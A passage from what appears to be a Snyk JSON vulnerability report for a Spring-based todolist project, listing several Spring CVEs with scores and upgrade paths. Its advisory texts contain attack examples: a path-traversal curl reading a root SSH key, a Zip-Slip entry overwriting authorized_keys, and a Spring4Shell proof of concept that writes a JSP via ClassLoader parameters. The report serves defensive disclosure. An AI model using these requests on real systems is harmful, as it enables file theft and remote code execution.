"assigner": "NVD", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:46:07.314890Z" - } - ], - "description": "## Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Directory Traversal. It allows remote attackers to read arbitrary files via a crafted URL.\n\n## Details\n\nA Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with \"dot-dot-slash (../)\" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.\n\nDirectory Traversal vulnerabilities can be generally divided into two types:\n\n- **Information Disclosure**: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.\n\n`st` is a module for serving static files on web pages, and contains a [vulnerability of this type](https://snyk.io/vuln/npm:st:20140206). In our example, we will serve files from the `public` route.\n\nIf an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.\n\n```\ncurl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa\n```\n**Note** `%2e` is the URL encoded version of `.` (dot).\n\n- **Writing arbitrary files**: Allows the attacker to create or replace existing files. This type of vulnerability is also known as `Zip-Slip`. \n\nOne way to achieve this is by using a malicious `zip` archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.\n\nThe following is an example of a `zip` archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in `/root/.ssh/` overwriting the `authorized_keys` file:\n\n```\n2018-04-15 22:04:29 ..... 19 19 good.txt\n2018-04-15 22:04:42 ..... 20 20 ../../../../../../root/.ssh/authorized_keys\n```\n\n## Remediation\nUpgrade `org.springframework:spring-core` to version 3.2.9.RELEASE, 4.0.5.RELEASE or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/e3e71ba92a8b82dadf474eda76cd2741f65a77a8)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/f6fddeb6eb7da625fd711ab371ff16512f431e8d)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/16414)\n- [Jira Issue](https://jira.spring.io/browse/SPR-12354)\n- [JVNDB](http://jvndb.jvn.jp/en/contents/2014/JVNDB-2014-000054.html)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3578)\n- [Pivotal Security](https://pivotal.io/security/cve-2014-3578)\n- [Pivotal Security](http://www.pivotal.io/security/cve-2014-3578)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1131882)\n", - "epssDetails": { - "percentile": "0.69801", - "probability": "0.00301", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2014-3578" - ], - "CWE": [ - "CWE-22" - ] - }, - "packageName": "org.springframework:spring-core", - "proprietary": false, - "creationTime": "2017-02-22T07:28:31.465000Z", - "functions_new": [ - { - "version": [ - "[3.0.0.RELEASE, 3.2.9.RELEASE)", - "[4.0.0.RELEASE, 4.0.5.RELEASE)" - ], - "functionId": { - "className": "org.springframework.util.StringUtils", - "functionName": "cleanPath" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2014-09-05T17:16:58Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-core" - }, - "publicationTime": "2014-09-05T17:16:58Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:46:07.314890Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.springframework:spring-context@3.2.6.RELEASE", - "org.springframework:spring-core@3.2.6.RELEASE" - ], - "upgradePath": [ - false, - "org.springframework:spring-context@3.2.9.RELEASE", - "org.springframework:spring-core@3.2.9.RELEASE" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.springframework:spring-core", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2434828", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "credit": [ - "4ra1n" - ], - "semver": { - "vulnerable": [ - "[,5.2.20.RELEASE)", - "[5.3.0,5.3.17)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.2.20.RELEASE", - "5.3.17" - ], - "patches": [], - "insights": { - "triageAdvice": "This vulnerability is only applicable on systems using Spring Expression Language (SpEL)" - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-expression", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/83ac65915871067c39a4fb255e0d484c785c0c11", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/issues/28145", - "title": "GitHub Issue" - }, - { - "url": "https://pivotal.io/security/cve-2022-22950", - "title": "Pivotal Security Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 6.5, - "modificationTime": "2024-03-11T09:48:12.598178Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:47.044801Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:01.573408Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:12.598178Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:47.044801Z" - } - ], - "description": "## Overview\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) by providing a specially crafted SpEL expression, that might result in an `OutOfMemoryError`.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.20.RELEASE, 5.3.17 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/83ac65915871067c39a4fb255e0d484c785c0c11)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/28145)\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2022-22950)\n", - "epssDetails": { - "percentile": "0.35300", - "probability": "0.00081", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-22950" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": "org.springframework:spring-expression", - "proprietary": false, - "creationTime": "2022-03-29T10:05:31.971026Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-03-29T09:51:43Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-expression" - }, - "publicationTime": "2022-03-29T14:24:08Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:47.044801Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.springframework:spring-context@3.2.6.RELEASE", - "org.springframework:spring-expression@3.2.6.RELEASE" - ], - "upgradePath": [ - false, - "org.springframework:spring-context@5.2.20.RELEASE", - "org.springframework:spring-expression@5.2.20.RELEASE" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.springframework:spring-expression", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-3369749", - "title": "Allocation of Resources Without Limits or Throttling", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "credit": [ - "Google OSS-Fuzz team" - ], - "semver": { - "vulnerable": [ - "[,5.2.23.RELEASE)", - "[5.3.0,5.3.26)", - "[6.0.0,6.0.7)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.2.23.RELEASE", - "5.3.26", - "6.0.7" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-expression", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/430fc25acad2e85cbdddcd52b64481691f03ebd1", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/52c93b1c4b24d70de233a958e60e7c5822bd274f", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/935c29e3ddba5b19951e54f6685c70ed45d9cbe5", - "title": "GitHub Commit" - }, - { - "url": "https://spring.io/security/cve-2023-20861", - "title": "Vulnerability Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 6.5, - "modificationTime": "2024-03-11T09:53:04.052825Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:54:00.291695Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:22.626014Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:04.052825Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:54:00.291695Z" - } - ], - "description": "## Overview\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via a crafted `SpEL` expression.\n## Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.23.RELEASE, 5.3.26, 6.0.7 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/430fc25acad2e85cbdddcd52b64481691f03ebd1)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/52c93b1c4b24d70de233a958e60e7c5822bd274f)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/935c29e3ddba5b19951e54f6685c70ed45d9cbe5)\n- [Vulnerability Advisory](https://spring.io/security/cve-2023-20861)\n", - "epssDetails": { - "percentile": "0.48906", - "probability": "0.00133", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2023-20861" - ], - "CWE": [ - "CWE-770" - ] - }, - "packageName": "org.springframework:spring-expression", - "proprietary": false, - "creationTime": "2023-03-23T12:26:39.837900Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2023-03-23T11:49:46Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-expression" - }, - "publicationTime": "2023-03-23T12:37:13.052190Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:54:00.291695Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.springframework:spring-context@3.2.6.RELEASE", - "org.springframework:spring-expression@3.2.6.RELEASE" - ], - "upgradePath": [ - false, - "org.springframework:spring-context@5.2.23.RELEASE", - "org.springframework:spring-expression@5.2.23.RELEASE" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.springframework:spring-expression", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-5422217", - "title": "Allocation of Resources Without Limits or Throttling", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "credit": [ - "Google OSS-Fuzz Team" - ], - "semver": { - "vulnerable": [ - "[,5.2.24.RELEASE)", - "[5.3.0,5.3.27)", - "[6.0.0,6.0.8)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.2.24.RELEASE", - "5.3.27", - "6.0.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 6.5, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-expression", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/965a6392757d20f9db19241126fcc719a51eac15", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/b73f5fcac22555f844cf27a7eeb876cb9d7f7f7e", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/ebc82654282bda547fbc20a9749ab1bda886a46f", - "title": "GitHub Commit" - }, - { - "url": "https://spring.io/security/cve-2023-20863", - "title": "Vulnerability Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 6.5, - "modificationTime": "2024-03-11T09:53:09.820460Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:01:15.433654Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:09.820460Z" - } - ], - "description": "## Overview\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling when a user provides a very long `SpEL` expression.\n## Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.24.RELEASE, 5.3.27, 6.0.8 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/965a6392757d20f9db19241126fcc719a51eac15)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/b73f5fcac22555f844cf27a7eeb876cb9d7f7f7e)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/ebc82654282bda547fbc20a9749ab1bda886a46f)\n- [Vulnerability Advisory](https://spring.io/security/cve-2023-20863)\n", - "epssDetails": { - "percentile": "0.70100", - "probability": "0.00306", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2023-20863" - ], - "CWE": [ - "CWE-770" - ] - }, - "packageName": "org.springframework:spring-expression", - "proprietary": false, - "creationTime": "2023-04-14T06:33:20.884492Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2023-04-14T06:25:45Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-expression" - }, - "publicationTime": "2023-04-14T06:33:21.063044Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:09.820460Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.springframework:spring-context@3.2.6.RELEASE", - "org.springframework:spring-expression@3.2.6.RELEASE" - ], - "upgradePath": [ - false, - "org.springframework:spring-context@5.2.24.RELEASE", - "org.springframework:spring-expression@5.2.24.RELEASE" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.springframework:spring-expression", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2436751", - "title": "Remote Code Execution", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[ ,5.2.20)", - "[5.3.0, 5.3.18)" - ] - }, - "exploit": "High", - "fixedIn": [ - "5.2.20", - "5.3.18" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9.8, - "functions": [ - { - "version": [ - "[ ,5.2.20)", - "[5.3.0, 5.3.18)" - ], - "functionId": { - "filePath": "org/springframework/beans/CachedIntrospectionResults.java", - "className": "CachedIntrospectionResults", - "functionName": "" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-beans", - "references": [ - { - "url": "https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html", - "title": "CyberKendra Post" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/002546b3e4b8d791ea6acccb81eb3168f51abb15", - "title": "GitHub Commit" - }, - { - "url": "https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/", - "title": "LunaSec Blog" - }, - { - "url": "https://blog.payara.fish/payara-and-spring4shell", - "title": "Payara Blogpost" - }, - { - "url": "https://github.com/CalumHutton/CVE-2022-22965-PoC_Payara", - "title": "Payara PoC" - }, - { - "url": "https://snyk.io/blog/spring4shell-zero-day-rce-spring-framework-explained/", - "title": "Snyk Blog - Technical Breakdown" - }, - { - "url": "https://github.com/Kirill89/CVE-2022-22965-PoC", - "title": "Snyk PoC" - }, - { - "url": "https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement", - "title": "Spring Security Announcement" - }, - { - "url": "https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative", - "title": "Spring Tomcat Mitigation Advice" - }, - { - "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", - "title": "CISA - Known Exploited Vulnerabilities" - }, - { - "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2022/CVE-2022-22965.yaml", - "title": "Nuclei Templates" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:48:12.628867Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:15.463472Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-30T15:25:03.231650Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:12.628867Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:15.463472Z" - } - ], - "description": "## Overview\n[org.springframework:spring-beans](https://www.baeldung.com/spring-bean) is a package that is the basis for Spring Framework's IoC container. The BeanFactory interface provides an advanced configuration mechanism capable of managing any type of object.\n\nAffected versions of this package are vulnerable to Remote Code Execution via manipulation of `ClassLoader` that is achievable with a POST HTTP request. This could allow an attacker to execute a webshell on a victim's application (TomCat), or download arbitrary files from the server (Payara/Glassfish).\r\n\r\n**Note:** \r\n* Current public exploits require victim applications to be built with JRE version 9 (or above) and to be deployed on either Tomcat, Payara, or Glassfish. \r\n\r\n* However, we have confirmed that it is technically possible for additional exploits to work under additional application configurations as well. \r\n\r\n* As such, while we recommend users prioritize first remediating against the configuration described above, for full protection, we also recommend upgrading all vulnerable versions to the fixed `spring-beans` version regardless of the application configuration.\r\n\r\n### Update Log \r\n* **31/03/2022 -** Severity was raised from 8.1 to 9.8\r\n* **08/04/2022 -** Advisory was updated to reflect that Snyk's security research team was able to author a working PoC of this vulnerability against applications that are deployed on Payara (which is based on Glassfish). \r\n\r\n\r\n## PoC\r\n```java\r\n1/ docker run -p 8888:8080 --rm --interactive --tty --name vm1 tomcat:9.0\r\n2/ ./mvnw install\r\n3/ docker cp target/handling-form-submission-complete.war vm1:/usr/local/tomcat/webapps\r\n4/ curl -X POST \\\r\n -H \"pre:<%\" \\\r\n -H \"post:;%>\" \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{pre}iSystem.out.println(123)%{post}i' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/handling-form-submission-complete' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.prefix=rce' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=' \\\r\n http://localhost:8888/handling-form-submission-complete/greeting\r\n5/ curl http://localhost:8888/handling-form-submission-complete/rce.jsp\r\n```\n## Remediation\nUpgrade `org.springframework:spring-beans` to version 5.2.20, 5.3.18 or higher.\n## References\n- [CyberKendra Post](https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/002546b3e4b8d791ea6acccb81eb3168f51abb15)\n- [LunaSec Blog](https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/)\n- [Payara Blogpost](https://blog.payara.fish/payara-and-spring4shell)\n- [Payara PoC](https://github.com/CalumHutton/CVE-2022-22965-PoC_Payara)\n- [Snyk Blog - Technical Breakdown](https://snyk.io/blog/spring4shell-zero-day-rce-spring-framework-explained/)\n- [Snyk PoC](https://github.com/Kirill89/CVE-2022-22965-PoC)\n- [Spring Security Announcement](https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement)\n- [Spring Tomcat Mitigation Advice](https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2022/CVE-2022-22965.yaml)\n", - "epssDetails": { - "percentile": "0.99975", - "probability": "0.97485", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-22965" - ], - "CWE": [ - "CWE-94" - ] - }, - "packageName": "org.springframework:spring-beans", - "proprietary": false, - "creationTime": "2022-03-30T21:42:31.436000Z", - "functions_new": [ - { - "version": [ - "[ ,5.2.20)", - "[5.3.0, 5.3.18)" - ], - "functionId": { - "className": "org.springframework.beans.CachedIntrospectionResults", - "functionName": "" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2022-03-30T21:42:24Z", - "exploitDetails": { - "sources": [ - "CISA", - "Nuclei Templates", - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "High", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Attacked", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-beans" - }, - "publicationTime": "2022-03-30T22:32:44Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-06-03T08:53:17.474380Z", - "socialTrendAlert": false, - "severityWithCritical": "critical", - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.springframework:spring-context@3.2.6.RELEASE", - "org.springframework:spring-beans@3.2.6.RELEASE" - ], - "upgradePath": [ - false, - "org.springframework:spring-context@5.2.20.RELEASE", - "org.springframework:spring-beans@5.2.20.RELEASE" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.springframework:spring-beans", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2823313", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", - "credit": [ - "Rob Ryan" - ], - "semver": { - "vulnerable": [ - "[,5.2.22.RELEASE)", - "[5.3.0,5.3.20)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.2.22.RELEASE", - "5.3.20" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-beans", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/50177b1ad3485bd44239b1756f6c14607476fcf2", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/83186b689f11f5e6efe7ccc08fdeb92f66fcd583", - "title": "GitHub Commit" - }, - { - "url": "https://tanzu.vmware.com/security/cve-2022-22970", - "title": "Tanzu vmware" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:47:28.086179Z" - }, - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:49:48.407397Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:21.626910Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:28.086179Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:48.407397Z" - } - ], - "description": "## Overview\n[org.springframework:spring-beans](https://www.baeldung.com/spring-bean) is a package that is the basis for Spring Framework's IoC container. The BeanFactory interface provides an advanced configuration mechanism capable of managing any type of object.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) if it relies on data binding to set a `MultipartFile` or `javax.servlet.Part` to a field in a model object.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open 